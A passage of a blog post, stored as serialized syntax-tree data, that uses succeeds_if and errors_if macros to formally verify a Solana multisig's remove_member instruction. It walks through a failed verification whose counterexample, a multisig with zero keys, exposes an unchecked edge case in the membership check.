}\n",[29056],{"type":26,"tag":130,"props":29057,"children":29058},{"__ignoreMap":7},[29059,29067],{"type":26,"tag":137,"props":29060,"children":29061},{"class":5559,"line":5560},[29062],{"type":26,"tag":137,"props":29063,"children":29064},{"style":5601},[29065],{"type":32,"value":29066},"#[invariant()]\n",{"type":26,"tag":137,"props":29068,"children":29069},{"class":5559,"line":5412},[29070,29074,29078,29082,29086,29090],{"type":26,"tag":137,"props":29071,"children":29072},{"style":5573},[29073],{"type":32,"value":16281},{"type":26,"tag":137,"props":29075,"children":29076},{"style":5573},[29077],{"type":32,"value":23744},{"type":26,"tag":137,"props":29079,"children":29080},{"style":6009},[29081],{"type":32,"value":23749},{"type":26,"tag":137,"props":29083,"children":29084},{"style":5601},[29085],{"type":32,"value":12175},{"type":26,"tag":137,"props":29087,"children":29088},{"style":5590},[29089],{"type":32,"value":12180},{"type":26,"tag":137,"props":29091,"children":29092},{"style":5601},[29093],{"type":32,"value":12185},{"type":26,"tag":35,"props":29095,"children":29096},{},[29097],{"type":32,"value":29098},"Let's test this!",{"type":26,"tag":35,"props":29100,"children":29101},{},[29102,29104,29109],{"type":32,"value":29103},"Our ",{"type":26,"tag":130,"props":29105,"children":29107},{"className":29106},[],[29108],{"type":32,"value":22748},{"type":32,"value":29110}," harness produces:",{"type":26,"tag":5512,"props":29112,"children":29114},{"code":29113},"VERIFICATION:- SUCCESSFUL\nVerification Time: 28.119272s\n",[29115],{"type":26,"tag":130,"props":29116,"children":29117},{"__ignoreMap":7},[29118],{"type":32,"value":29113},{"type":26,"tag":35,"props":29120,"children":29121},{},[29122],{"type":32,"value":29123},"This tells us that if our multisig has at least two keys then the instruction will succeed.",{"type":26,"tag":35,"props":29125,"children":29126},{},[29127,29129,29134],{"type":32,"value":29128},"However, remember that since ",{"type":26,"tag":130,"props":29130,"children":29132},{"className":29131},[],[29133],{"type":32,"value":22748},{"type":32,"value":29135}," represents just the sufficient conditions, there may be other cases where the function succeeds.",{"type":26,"tag":35,"props":29137,"children":29138},{},[29139,29141,29146,29148,29153,29155,29160],{"type":32,"value":29140},"Suppose we want to be sure that this condition is the ",{"type":26,"tag":762,"props":29142,"children":29143},{},[29144],{"type":32,"value":29145},"only condition",{"type":32,"value":29147}," in which the function will succeed (i.e. ",{"type":26,"tag":762,"props":29149,"children":29150},{},[29151],{"type":32,"value":29152},"\"the function will succeed if and only if the multisig has at least two keys\"",{"type":32,"value":29154},"). We could attempt to verify the other side of this with an ",{"type":26,"tag":130,"props":29156,"children":29158},{"className":29157},[],[29159],{"type":32,"value":22755},{"type":32,"value":29161}," macro such as:",{"type":26,"tag":5512,"props":29163,"children":29165},{"code":29164,"language":5551,"meta":7,"className":5552,"style":7},"#[succeeds_if(\n    ctx.accounts.multisig.keys.len() > 1\n)]\n#[errors_if(\n    ctx.accounts.multisig.keys.len() \u003C= 1\n)]\nfn remove_member(...) { ... }\n",[29166],{"type":26,"tag":130,"props":29167,"children":29168},{"__ignoreMap":7},[29169,29176,29223,29230,29237,29284,29291],{"type":26,"tag":137,"props":29170,"children":29171},{"class":5559,"line":5560},[29172],{"type":26,"tag":137,"props":29173,"children":29174},{"style":5601},[29175],{"type":32,"value":26703},{"type":26,"tag":137,"props":29177,"children":29178},{"class":5559,"line":5412},[29179,29183,29187,29191,29195,29199,29203,29207,29211,29215,29219],{"type":26,"tag":137,"props":29180,"children":29181},{"style":5601},[29182],{"type":32,"value":22817},{"type":26,"tag":137,"props":29184,"children":29185},{"style":5590},[29186],{"type":32,"value":470},{"type":26,"tag":137,"props":29188,"children":29189},{"style":5601},[29190],{"type":32,"value":17266},{"type":26,"tag":137,"props":29192,"children":29193},{"style":5590},[29194],{"type":32,"value":470},{"type":26,"tag":137,"props":29196,"children":29197},{"style":5601},[29198],{"type":32,"value":26396},{"type":26,"tag":137,"props":29200,"children":29201},{"style":5590},[29202],{"type":32,"value":470},{"type":26,"tag":137,"props":29204,"children":29205},{"style":5601},[29206],{"type":32,"value":23576},{"type":26,"tag":137,"props":29208,"children":29209},{"style":5590},[29210],{"type":32,"value":470},{"type":26,"tag":137,"props":29212,"children":29213},{"style":5601},[29214],{"type":32,"value":23614},{"type":26,"tag":137,"props":29216,"children":29217},{"style":5590},[29218],{"type":32,"value":13052},{"type":26,"tag":137,"props":29220,"children":29221},{"style":5601},[29222],{"type":32,"value":22035},{"type":26,"tag":137,"props":29224,"children":29225},{"class":5559,"line":5417},[29226],{"type":26,"tag":137,"props":29227,"children":29228},{"style":5601},[29229],{"type":32,"value":22852},{"type":26,"tag":137,"props":29231,"children":29232},{"class":5559,"line":5642},[29233],{"type":26,"tag":137,"props":29234,"children":29235},{"style":5601},[29236],{"type":32,"value":22809},{"type":26,"tag":137,"props":29238,"children":29239},{"class":5559,"line":5745},[29240,29244,29248,29252,29256,29260,29264,29268,29272,29276,29280],{"type":26,"tag":137,"props":29241,"children":29242},{"style":5601},[29243],{"type":32,"value":22817},{"type":26,"tag":137,"props":29245,"children":29246},{"style":5590},[29247],{"type":32,"value":470},{"type":26,"tag":137,"props":29249,"children":29250},{"style":5601},[29251],{"type":32,"value":17266},{"type":26,"tag":137,"props":29253,"children":29254},{"style":5590},[29255],{"type":32,"value":470},{"type":26,"tag":137,"props":29257,"children":29258},{"style":5601},[29259],{"type":32,"value":26396},{"type":26,"tag":137,"props":29261,"children":29262},{"style":5590},[29263],{"type":32,"value":470},{"type":26,"tag":137,"props":29265,"children":29266},{"style":5601},[29267],{"type":32,"value":23576},{"type":26,"tag":137,"props":29269,"children":29270},{"style":5590},[29271],{"type":32,"value":470},{"type":26,"tag":137,"props":29273,"children":29274},{"style":5601},[29275],{"type":32,"value":23614},{"type":26,"tag":137,"props":29277,"children":29278},{"style":5590},[29279],{"type":32,"value":22007},{"type":26,"tag":137,"props":29281,"children":29282},{"style":5601},[29283],{"type":32,"value":22035},{"type":26,"tag":137,"props":29285,"children":29286},{"class":5559,"line":5850},[29287],{"type":26,"tag":137,"props":29288,"children":29289},{"style":5601},[29290],{"type":32,"value":22852},{"type":26,"tag":137,"props":29292,"children":29293},{"class":5559,"line":5878},[29294,29298,29302,29306,29310,29314,29318],{"type":26,"tag":137,"props":29295,"children":29296},{"style":5573},[29297],{"type":32,"value":22860},{"type":26,"tag":137,"props":29299,"children":29300},{"style":5682},[29301],{"type":32,"value":28357},{"type":26,"tag":137,"props":29303,"children":29304},{"style":5601},[29305],{"type":32,"value":165},{"type":26,"tag":137,"props":29307,"children":29308},{"style":5590},[29309],{"type":32,"value":12180},{"type":26,"tag":137,"props":29311,"children":29312},{"style":5601},[29313],{"type":32,"value":26580},{"type":26,"tag":137,"props":29315,"children":29316},{"style":5590},[29317],{"type":32,"value":12180},{"type":26,"tag":137,"props":29319,"children":29320},{"style":5601},[29321],{"type":32,"value":12185},{"type":26,"tag":35,"props":29323,"children":29324},{},[29325,29327,29332],{"type":32,"value":29326},"Let's test this, we just need to run the new ",{"type":26,"tag":130,"props":29328,"children":29330},{"className":29329},[],[29331],{"type":32,"value":22755},{"type":32,"value":29333}," harness:",{"type":26,"tag":5512,"props":29335,"children":29337},{"code":29336},"VERIFICATION:- FAILED\nVerification Time: 31.900913s\n",[29338],{"type":26,"tag":130,"props":29339,"children":29340},{"__ignoreMap":7},[29341],{"type":32,"value":29336},{"type":26,"tag":35,"props":29343,"children":29344},{},[29345],{"type":32,"value":29346},"Hmm, this verification failed! Let's look at the counterexample. The multisig it is trying to remove a member from looks like:",{"type":26,"tag":5512,"props":29348,"children":29350},{"code":29349,"language":5551,"meta":7,"className":5552,"style":7},"Account {\n    account: Ms {\n        threshold: 0,\n        authority_index: 0,\n        transaction_index: 0,\n        ms_change_index: 0,\n        bump: 0,\n        create_key: ...,\n        allow_external_execute: false,\n        keys: Vec {\n            data: ...,\n            size: 0,\n        },\n    },\n    info: AccountInfo { ... },\n}\n",[29351],{"type":26,"tag":130,"props":29352,"children":29353},{"__ignoreMap":7},[29354,29365,29384,29403,29422,29441,29460,29479,29498,29517,29536,29556,29575,29582,29589,29616],{"type":26,"tag":137,"props":29355,"children":29356},{"class":5559,"line":5560},[29357,29361],{"type":26,"tag":137,"props":29358,"children":29359},{"style":6009},[29360],{"type":32,"value":19739},{"type":26,"tag":137,"props":29362,"children":29363},{"style":5601},[29364],{"type":32,"value":5875},{"type":26,"tag":137,"props":29366,"children":29367},{"class":5559,"line":5412},[29368,29372,29376,29380],{"type":26,"tag":137,"props":29369,"children":29370},{"style":5584},[29371],{"type":32,"value":27763},{"type":26,"tag":137,"props":29373,"children":29374},{"style":5590},[29375],{"type":32,"value":7072},{"type":26,"tag":137,"props":29377,"children":29378},{"style":6009},[29379],{"type":32,"value":23749},{"type":26,"tag":137,"props":29381,"children":29382},{"style":5601},[29383],{"type":32,"value":5875},{"type":26,"tag":137,"props":29385,"children":29386},{"class":5559,"line":5417},[29387,29391,29395,29399],{"type":26,"tag":137,"props":29388,"children":29389},{"style":5584},[29390],{"type":32,"value":26417},{"type":26,"tag":137,"props":29392,"children":29393},{"style":5590},[29394],{"type":32,"value":7072},{"type":26,"tag":137,"props":29396,"children":29397},{"style":5626},[29398],{"type":32,"value":5629},{"type":26,"tag":137,"props":29400,"children":29401},{"style":5601},[29402],{"type":32,"value":6099},{"type":26,"tag":137,"props":29404,"children":29405},{"class":5559,"line":5642},[29406,29410,29414,29418],{"type":26,"tag":137,"props":29407,"children":29408},{"style":5584},[29409],{"type":32,"value":27803},{"type":26,"tag":137,"props":29411,"children":29412},{"style":5590},[29413],{"type":32,"value":7072},{"type":26,"tag":137,"props":29415,"children":29416},{"style":5626},[29417],{"type":32,"value":5629},{"type":26,"tag":137,"props":29419,"children":29420},{"style":5601},[29421],{"type":32,"value":6099},{"type":26,"tag":137,"props":29423,"children":29424},{"class":5559,"line":5745},[29425,29429,29433,29437],{"type":26,"tag":137,"props":29426,"children":29427},{"style":5584},[29428],{"type":32,"value":27823},{"type":26,"tag":137,"props":29430,"children":29431},{"style":5590},[29432],{"type":32,"value":7072},{"type":26,"tag":137,"props":29434,"children":29435},{"style":5626},[29436],{"type":32,"value":5629},{"type":26,"tag":137,"props":29438,"children":29439},{"style":5601},[29440],{"type":32,"value":6099},{"type":26,"tag":137,"props":29442,"children":29443},{"class":5559,"line":5850},[29444,29448,29452,29456],{"type":26,"tag":137,"props":29445,"children":29446},{"style":5584},[29447],{"type":32,"value":27843},{"type":26,"tag":137,"props":29449,"children":29450},{"style":5590},[29451],{"type":32,"value":7072},{"type":26,"tag":137,"props":29453,"children":29454},{"style":5626},[29455],{"type":32,"value":5629},{"type":26,"tag":137,"props":29457,"children":29458},{"style":5601},[29459],{"type":32,"value":6099},{"type":26,"tag":137,"props":29461,"children":29462},{"class":5559,"line":5878},[29463,29467,29471,29475],{"type":26,"tag":137,"props":29464,"children":29465},{"style":5584},[29466],{"type":32,"value":27863},{"type":26,"tag":137,"props":29468,"children":29469},{"style":5590},[29470],{"type":32,"value":7072},{"type":26,"tag":137,"props":29472,"children":29473},{"style":5626},[29474],{"type":32,"value":5629},{"type":26,"tag":137,"props":29476,"children":29477},{"style":5601},[29478],{"type":32,"value":6099},{"type":26,"tag":137,"props":29480,"children":29481},{"class":5559,"line":5891},[29482,29486,29490,29494],{"type":26,"tag":137,"props":29483,"children":29484},{"style":5584},[29485],{"type":32,"value":26430},{"type":26,"tag":137,"props":29487,"children":29488},{"style":5590},[29489],{"type":32,"value":7072},{"type":26,"tag":137,"props":29491,"children":29492},{"style":5590},[29493],{"type":32,"value":27891},{"type":26,"tag":137,"props":29495,"children":29496},{"style":5601},[29497],{"type":32,"value":6099},{"type":26,"tag":137,"props":29499,"children":29500},{"class":5559,"line":5909},[29501,29505,29509,29513],{"type":26,"tag":137,"props":29502,"children":29503},{"style":5584},[29504],{"type":32,"value":27903},{"type":26,"tag":137,"props":29506,"children":29507},{"style":5590},[29508],{"type":32,"value":7072},{"type":26,"tag":137,"props":29510,"children":29511},{"style":5573},[29512],{"type":32,"value":11645},{"type":26,"tag":137,"props":29514,"children":29515},{"style":5601},[29516],{"type":32,"value":6099},{"type":26,"tag":137,"props":29518,"children":29519},{"class":5559,"line":5930},[29520,29524,29528,29532],{"type":26,"tag":137,"props":29521,"children":29522},{"style":5584},[29523],{"type":32,"value":27923},{"type":26,"tag":137,"props":29525,"children":29526},{"style":5590},[29527],{"type":32,"value":7072},{"type":26,"tag":137,"props":29529,"children":29530},{"style":6009},[29531],{"type":32,"value":23982},{"type":26,"tag":137,"props":29533,"children":29534},{"style":5601},[29535],{"type":32,"value":5875},{"type":26,"tag":137,"props":29537,"children":29538},{"class":5559,"line":5939},[29539,29544,29548,29552],{"type":26,"tag":137,"props":29540,"children":29541},{"style":5584},[29542],{"type":32,"value":29543},"            data",{"type":26,"tag":137,"props":29545,"children":29546},{"style":5590},[29547],{"type":32,"value":7072},{"type":26,"tag":137,"props":29549,"children":29550},{"style":5590},[29551],{"type":32,"value":27891},{"type":26,"tag":137,"props":29553,"children":29554},{"style":5601},[29555],{"type":32,"value":6099},{"type":26,"tag":137,"props":29557,"children":29558},{"class":5559,"line":6191},[29559,29563,29567,29571],{"type":26,"tag":137,"props":29560,"children":29561},{"style":5584},[29562],{"type":32,"value":27944},{"type":26,"tag":137,"props":29564,"children":29565},{"style":5590},[29566],{"type":32,"value":7072},{"type":26,"tag":137,"props":29568,"children":29569},{"style":5626},[29570],{"type":32,"value":5629},{"type":26,"tag":137,"props":29572,"children":29573},{"style":5601},[29574],{"type":32,"value":6099},{"type":26,"tag":137,"props":29576,"children":29577},{"class":5559,"line":6208},[29578],{"type":26,"tag":137,"props":29579,"children":29580},{"style":5601},[29581],{"type":32,"value":27965},{"type":26,"tag":137,"props":29583,"children":29584},{"class":5559,"line":6225},[29585],{"type":26,"tag":137,"props":29586,"children":29587},{"style":5601},[29588],{"type":32,"value":27973},{"type":26,"tag":137,"props":29590,"children":29591},{"class":5559,"line":6238},[29592,29596,29600,29604,29608,29612],{"type":26,"tag":137,"props":29593,"children":29594},{"style":5584},[29595],{"type":32,"value":27981},{"type":26,"tag":137,"props":29597,"children":29598},{"style":5590},[29599],{"type":32,"value":7072},{"type":26,"tag":137,"props":29601,"children":29602},{"style":6009},[29603],{"type":32,"value":27990},{"type":26,"tag":137,"props":29605,"children":29606},{"style":5601},[29607],{"type":32,"value":12175},{"type":26,"tag":137,"props":29609,"children":29610},{"style":5590},[29611],{"type":32,"value":12180},{"type":26,"tag":137,"props":29613,"children":29614},{"style":5601},[29615],{"type":32,"value":28003},{"type":26,"tag":137,"props":29617,"children":29618},{"class":5559,"line":6247},[29619],{"type":26,"tag":137,"props":29620,"children":29621},{"style":5601},[29622],{"type":32,"value":6507},{"type":26,"tag":35,"props":29624,"children":29625},{},[29626],{"type":32,"value":29627},"Interestingly, the multisig has 0 keys and yet this instruction does not error. Let's take a closer look to figure out why:",{"type":26,"tag":35,"props":29629,"children":29630},{},[29631,29633,29639],{"type":32,"value":29632},"Inside our handler, we see that it only checks if the number of keys exactly equals 1. Otherwise it invokes ",{"type":26,"tag":130,"props":29634,"children":29636},{"className":29635},[],[29637],{"type":32,"value":29638},"Ms::remove_member",{"type":32,"value":7072},{"type":26,"tag":5512,"props":29641,"children":29643},{"code":29642,"language":5551,"meta":7,"className":5552,"style":7},"if ctx.accounts.multisig.keys.len() == 1 {\n    return err!(MsError::CannotRemoveSoloMember);\n}\nctx.accounts.multisig.remove_member(old_member)?;\n",[29644],{"type":26,"tag":130,"props":29645,"children":29646},{"__ignoreMap":7},[29647,29706,29737,29744],{"type":26,"tag":137,"props":29648,"children":29649},{"class":5559,"line":5560},[29650,29654,29658,29662,29666,29670,29674,29678,29682,29686,29690,29694,29698,29702],{"type":26,"tag":137,"props":29651,"children":29652},{"style":5610},[29653],{"type":32,"value":18171},{"type":26,"tag":137,"props":29655,"children":29656},{"style":5584},[29657],{"type":32,"value":28435},{"type":26,"tag":137,"props":29659,"children":29660},{"style":5590},[29661],{"type":32,"value":470},{"type":26,"tag":137,"props":29663,"children":29664},{"style":5601},[29665],{"type":32,"value":17266},{"type":26,"tag":137,"props":29667,"children":29668},{"style":5590},[29669],{"type":32,"value":470},{"type":26,"tag":137,"props":29671,"children":29672},{"style":5601},[29673],{"type":32,"value":26396},{"type":26,"tag":137,"props":29675,"children":29676},{"style":5590},[29677],{"type":32,"value":470},{"type":26,"tag":137,"props":29679,"children":29680},{"style":5601},[29681],{"type":32,"value":23576},{"type":26,"tag":137,"props":29683,"children":29684},{"style":5590},[29685],{"type":32,"value":470},{"type":26,"tag":137,"props":29687,"children":29688},{"style":5682},[29689],{"type":32,"value":11727},{"type":26,"tag":137,"props":29691,"children":29692},{"style":5601},[29693],{"type":32,"value":16634},{"type":26,"tag":137,"props":29695,"children":29696},{"style":5590},[29697],{"type":32,"value":11161},{"type":26,"tag":137,"props":29699,"children":29700},{"style":5626},[29701],{"type":32,"value":7104},{"type":26,"tag":137,"props":29703,"children":29704},{"style":5601},[29705],{"type":32,"value":5875},{"type":26,"tag":137,"props":29707,"children":29708},{"class":5559,"line":5412},[29709,29713,29717,29721,29725,29729,29733],{"type":26,"tag":137,"props":29710,"children":29711},{"style":5610},[29712],{"type":32,"value":19582},{"type":26,"tag":137,"props":29714,"children":29715},{"style":5682},[29716],{"type":32,"value":26099},{"type":26,"tag":137,"props":29718,"children":29719},{"style":5601},[29720],{"type":32,"value":165},{"type":26,"tag":137,"props":29722,"children":29723},{"style":6009},[29724],{"type":32,"value":26108},{"type":26,"tag":137,"props":29726,"children":29727},{"style":5590},[29728],{"type":32,"value":6072},{"type":26,"tag":137,"props":29730,"children":29731},{"style":6009},[29732],{"type":32,"value":28511},{"type":26,"tag":137,"props":29734,"children":29735},{"style":5601},[29736],{"type":32,"value":6430},{"type":26,"tag":137,"props":29738,"children":29739},{"class":5559,"line":5417},[29740],{"type":26,"tag":137,"props":29741,"children":29742},{"style":5601},[29743],{"type":32,"value":6507},{"type":26,"tag":137,"props":29745,"children":29746},{"class":5559,"line":5642},[29747,29751,29755,29759,29763,29767,29771,29775,29779,29783,29787,29791],{"type":26,"tag":137,"props":29748,"children":29749},{"style":5584},[29750],{"type":32,"value":22874},{"type":26,"tag":137,"props":29752,"children":29753},{"style":5590},[29754],{"type":32,"value":470},{"type":26,"tag":137,"props":29756,"children":29757},{"style":5601},[29758],{"type":32,"value":17266},{"type":26,"tag":137,"props":29760,"children":29761},{"style":5590},[29762],{"type":32,"value":470},{"type":26,"tag":137,"props":29764,"children":29765},{"style":5601},[29766],{"type":32,"value":26396},{"type":26,"tag":137,"props":29768,"children":29769},{"style":5590},[29770],{"type":32,"value":470},{"type":26,"tag":137,"props":29772,"children":29773},{"style":5682},[29774],{"type":32,"value":28058},{"type":26,"tag":137,"props":29776,"children":29777},{"style":5601},[29778],{"type":32,"value":165},{"type":26,"tag":137,"props":29780,"children":29781},{"style":5584},[29782],{"type":32,"value":28391},{"type":26,"tag":137,"props":29784,"children":29785},{"style":5601},[29786],{"type":32,"value":200},{"type":26,"tag":137,"props":29788,"children":29789},{"style":5590},[29790],{"type":32,"value":5737},{"type":26,"tag":137,"props":29792,"children":29793},{"style":5601},[29794],{"type":32,"value":5604},{"type":26,"tag":35,"props":29796,"children":29797},{},[29798,29800,29806,29808,29814],{"type":32,"value":29799},"In that function, it checks if the member to remove is contained in that multisig (with ",{"type":26,"tag":130,"props":29801,"children":29803},{"className":29802},[],[29804],{"type":32,"value":29805},"Ms::is_member",{"type":32,"value":29807},") and if it is not, it simply skips the removal and returns ",{"type":26,"tag":130,"props":29809,"children":29811},{"className":29810},[],[29812],{"type":32,"value":29813},"Ok(())",{"type":32,"value":470},{"type":26,"tag":5512,"props":29816,"children":29818},{"code":29817,"language":5551,"meta":7,"className":5552,"style":7},"pub fn remove_member(&mut self, member: Pubkey) -> Result\u003C()> {\n    if let Some(ind) = self.is_member(member) {\n        self.keys.remove(ind);\n        if self.keys.len() \u003C usize::from(self.threshold) {\n            self.threshold = self.keys.len().try_into().unwrap();\n        }\n    }\n    Ok(())\n}\n",[29819],{"type":26,"tag":130,"props":29820,"children":29821},{"__ignoreMap":7},[29822,29886,29945,29982,30041,30109,30116,30123,30134],{"type":26,"tag":137,"props":29823,"children":29824},{"class":5559,"line":5560},[29825,29829,29833,29837,29841,29845,29849,29853,29857,29862,29866,29870,29874,29878,29882],{"type":26,"tag":137,"props":29826,"children":29827},{"style":5573},[29828],{"type":32,"value":16281},{"type":26,"tag":137,"props":29830,"children":29831},{"style":5573},[29832],{"type":32,"value":16286},{"type":26,"tag":137,"props":29834,"children":29835},{"style":5682},[29836],{"type":32,"value":28357},{"type":26,"tag":137,"props":29838,"children":29839},{"style":5601},[29840],{"type":32,"value":165},{"type":26,"tag":137,"props":29842,"children":29843},{"style":5590},[29844],{"type":32,"value":5694},{"type":26,"tag":137,"props":29846,"children":29847},{"style":5573},[29848],{"type":32,"value":6325},{"type":26,"tag":137,"props":29850,"children":29851},{"style":5573},[29852],{"type":32,"value":16388},{"type":26,"tag":137,"props":29854,"children":29855},{"style":5601},[29856],{"type":32,"value":1108},{"type":26,"tag":137,"props":29858,"children":29859},{"style":5584},[29860],{"type":32,"value":29861},"member",{"type":26,"tag":137,"props":29863,"children":29864},{"style":5590},[29865],{"type":32,"value":7072},{"type":26,"tag":137,"props":29867,"children":29868},{"style":6009},[29869],{"type":32,"value":23450},{"type":26,"tag":137,"props":29871,"children":29872},{"style":5601},[29873],{"type":32,"value":5671},{"type":26,"tag":137,"props":29875,"children":29876},{"style":5590},[29877],{"type":32,"value":16348},{"type":26,"tag":137,"props":29879,"children":29880},{"style":6009},[29881],{"type":32,"value":16353},{"type":26,"tag":137,"props":29883,"children":29884},{"style":5601},[29885],{"type":32,"value":22925},{"type":26,"tag":137,"props":29887,"children":29888},{"class":5559,"line":5412},[29889,29893,29898,29903,29907,29912,29916,29920,29924,29928,29933,29937,29941],{"type":26,"tag":137,"props":29890,"children":29891},{"style":5610},[29892],{"type":32,"value":14870},{"type":26,"tag":137,"props":29894,"children":29895},{"style":5573},[29896],{"type":32,"value":29897}," let",{"type":26,"tag":137,"props":29899,"children":29900},{"style":6009},[29901],{"type":32,"value":29902}," Some",{"type":26,"tag":137,"props":29904,"children":29905},{"style":5601},[29906],{"type":32,"value":165},{"type":26,"tag":137,"props":29908,"children":29909},{"style":5584},[29910],{"type":32,"value":29911},"ind",{"type":26,"tag":137,"props":29913,"children":29914},{"style":5601},[29915],{"type":32,"value":5671},{"type":26,"tag":137,"props":29917,"children":29918},{"style":5590},[29919],{"type":32,"value":289},{"type":26,"tag":137,"props":29921,"children":29922},{"style":5573},[29923],{"type":32,"value":16388},{"type":26,"tag":137,"props":29925,"children":29926},{"style":5590},[29927],{"type":32,"value":470},{"type":26,"tag":137,"props":29929,"children":29930},{"style":5682},[29931],{"type":32,"value":29932},"is_member",{"type":26,"tag":137,"props":29934,"children":29935},{"style":5601},[29936],{"type":32,"value":165},{"type":26,"tag":137,"props":29938,"children":29939},{"style":5584},[29940],{"type":32,"value":29861},{"type":26,"tag":137,"props":29942,"children":29943},{"style":5601},[29944],{"type":32,"value":17395},{"type":26,"tag":137,"props":29946,"children":29947},{"class":5559,"line":5417},[29948,29953,29957,29961,29965,29970,29974,29978],{"type":26,"tag":137,"props":29949,"children":29950},{"style":5573},[29951],{"type":32,"value":29952},"        self",{"type":26,"tag":137,"props":29954,"children":29955},{"style":5590},[29956],{"type":32,"value":470},{"type":26,"tag":137,"props":29958,"children":29959},{"style":5601},[29960],{"type":32,"value":23576},{"type":26,"tag":137,"props":29962,"children":29963},{"style":5590},[29964],{"type":32,"value":470},{"type":26,"tag":137,"props":29966,"children":29967},{"style":5682},[29968],{"type":32,"value":29969},"remove",{"type":26,"tag":137,"props":29971,"children":29972},{"style":5601},[29973],{"type":32,"value":165},{"type":26,"tag":137,"props":29975,"children":29976},{"style":5584},[29977],{"type":32,"value":29911},{"type":26,"tag":137,"props":29979,"children":29980},{"style":5601},[29981],{"type":32,"value":6430},{"type":26,"tag":137,"props":29983,"children":29984},{"class":5559,"line":5642},[29985,29989,29993,29997,30001,30005,30009,30013,30017,30021,30025,30029,30033,30037],{"type":26,"tag":137,"props":29986,"children":29987},{"style":5610},[29988],{"type":32,"value":5856},{"type":26,"tag":137,"props":29990,"children":29991},{"style":5573},[29992],{"type":32,"value":16388},{"type":26,"tag":137,"props":29994,"children":29995},{"style":5590},[29996],{"type":32,"value":470},{"type":26,"tag":137,"props":29998,"children":29999},{"style":5601},[30000],{"type":32,"value":23576},{"type":26,"tag":137,"props":30002,"children":30003},{"style":5590},[30004],{"type":32,"value":470},{"type":26,"tag":137,"props":30006,"children":30007},{"style":5682},[30008],{"type":32,"value":11727},{"type":26,"tag":137,"props":30010,"children":30011},{"style":5601},[30012],{"type":32,"value":28636},{"type":26,"tag":137,"props":30014,"children":30015},{"style":6009},[30016],{"type":32,"value":19194},{"type":26,"tag":137,"props":30018,"children":30019},{"style":5590},[30020],{"type":32,"value":6072},{"type":26,"tag":137,"props":30022,"children":30023},{"style":5682},[30024],{"type":32,"value":22066},{"type":26,"tag":137,"props":30026,"children":30027},{"style":5601},[30028],{"type":32,"value":165},{"type":26,"tag":137,"props":30030,"children":30031},{"style":5573},[30032],{"type":32,"value":16304},{"type":26,"tag":137,"props":30034,"children":30035},{"style":5590},[30036],{"type":32,"value":470},{"type":26,"tag":137,"props":30038,"children":30039},{"style":5601},[30040],{"type":32,"value":28681},{"type":26,"tag":137,"props":30042,"children":30043},{"class":5559,"line":5745},[30044,30049,30053,30057,30061,30065,30069,30073,30077,30081,30085,30089,30093,30097,30101,30105],{"type":26,"tag":137,"props":30045,"children":30046},{"style":5573},[30047],{"type":32,"value":30048},"            self",{"type":26,"tag":137,"props":30050,"children":30051},{"style":5590},[30052],{"type":32,"value":470},{"type":26,"tag":137,"props":30054,"children":30055},{"style":5601},[30056],{"type":32,"value":23664},{"type":26,"tag":137,"props":30058,"children":30059},{"style":5590},[30060],{"type":32,"value":289},{"type":26,"tag":137,"props":30062,"children":30063},{"style":5573},[30064],{"type":32,"value":16388},{"type":26,"tag":137,"props":30066,"children":30067},{"style":5590},[30068],{"type":32,"value":470},{"type":26,"tag":137,"props":30070,"children":30071},{"style":5601},[30072],{"type":32,"value":23576},{"type":26,"tag":137,"props":30074,"children":30075},{"style":5590},[30076],{"type":32,"value":470},{"type":26,"tag":137,"props":30078,"children":30079},{"style":5682},[30080],{"type":32,"value":11727},{"type":26,"tag":137,"props":30082,"children":30083},{"style":5601},[30084],{"type":32,"value":16470},{"type":26,"tag":137,"props":30086,"children":30087},{"style":5590},[30088],{"type":32,"value":470},{"type":26,"tag":137,"props":30090,"children":30091},{"style":5682},[30092],{"type":32,"value":28754},{"type":26,"tag":137,"props":30094,"children":30095},{"style":5601},[30096],{"type":32,"value":16470},{"type":26,"tag":137,"props":30098,"children":30099},{"style":5590},[30100],{"type":32,"value":470},{"type":26,"tag":137,"props":30102,"children":30103},{"style":5682},[30104],{"type":32,"value":6262},{"type":26,"tag":137,"props":30106,"children":30107},{"style":5601},[30108],{"type":32,"value":6267},{"type":26,"tag":137,"props":30110,"children":30111},{"class":5559,"line":5850},[30112],{"type":26,"tag":137,"props":30113,"children":30114},{"style":5601},[30115],{"type":32,"value":5936},{"type":26,"tag":137,"props":30117,"children":30118},{"class":5559,"line":5878},[30119],{"type":26,"tag":137,"props":30120,"children":30121},{"style":5601},[30122],{"type":32,"value":5945},{"type":26,"tag":137,"props":30124,"children":30125},{"class":5559,"line":5891},[30126,30130],{"type":26,"tag":137,"props":30127,"children":30128},{"style":6009},[30129],{"type":32,"value":16924},{"type":26,"tag":137,"props":30131,"children":30132},{"style":5601},[30133],{"type":32,"value":16929},{"type":26,"tag":137,"props":30135,"children":30136},{"class":5559,"line":5909},[30137],{"type":26,"tag":137,"props":30138,"children":30139},{"style":5601},[30140],{"type":32,"value":6507},{"type":26,"tag":35,"props":30142,"children":30143},{},[30144,30146,30151,30153,30159,30161,30167,30169,30174],{"type":32,"value":30145},"Inside ",{"type":26,"tag":130,"props":30147,"children":30149},{"className":30148},[],[30150],{"type":32,"value":29805},{"type":32,"value":30152},", we see that it performs a ",{"type":26,"tag":130,"props":30154,"children":30156},{"className":30155},[],[30157],{"type":32,"value":30158},"binary_search",{"type":32,"value":30160}," on the keys vec and returns the index or ",{"type":26,"tag":130,"props":30162,"children":30164},{"className":30163},[],[30165],{"type":32,"value":30166},"None",{"type":32,"value":30168},". Since the vec has size zero, this will just return ",{"type":26,"tag":130,"props":30170,"children":30172},{"className":30171},[],[30173],{"type":32,"value":30166},{"type":32,"value":470},{"type":26,"tag":5512,"props":30176,"children":30178},{"code":30177,"language":5551,"meta":7,"className":5552,"style":7},"pub fn is_member(&self, member: Pubkey) -> Option\u003Cusize> {\n    match self.keys.binary_search(&member) {\n        Ok(ind) => Some(ind),\n        _ => None,\n    }\n}\n",[30179],{"type":26,"tag":130,"props":30180,"children":30181},{"__ignoreMap":7},[30182,30251,30294,30333,30355,30362],{"type":26,"tag":137,"props":30183,"children":30184},{"class":5559,"line":5560},[30185,30189,30193,30198,30202,30206,30210,30214,30218,30222,30226,30230,30234,30239,30243,30247],{"type":26,"tag":137,"props":30186,"children":30187},{"style":5573},[30188],{"type":32,"value":16281},{"type":26,"tag":137,"props":30190,"children":30191},{"style":5573},[30192],{"type":32,"value":16286},{"type":26,"tag":137,"props":30194,"children":30195},{"style":5682},[30196],{"type":32,"value":30197}," 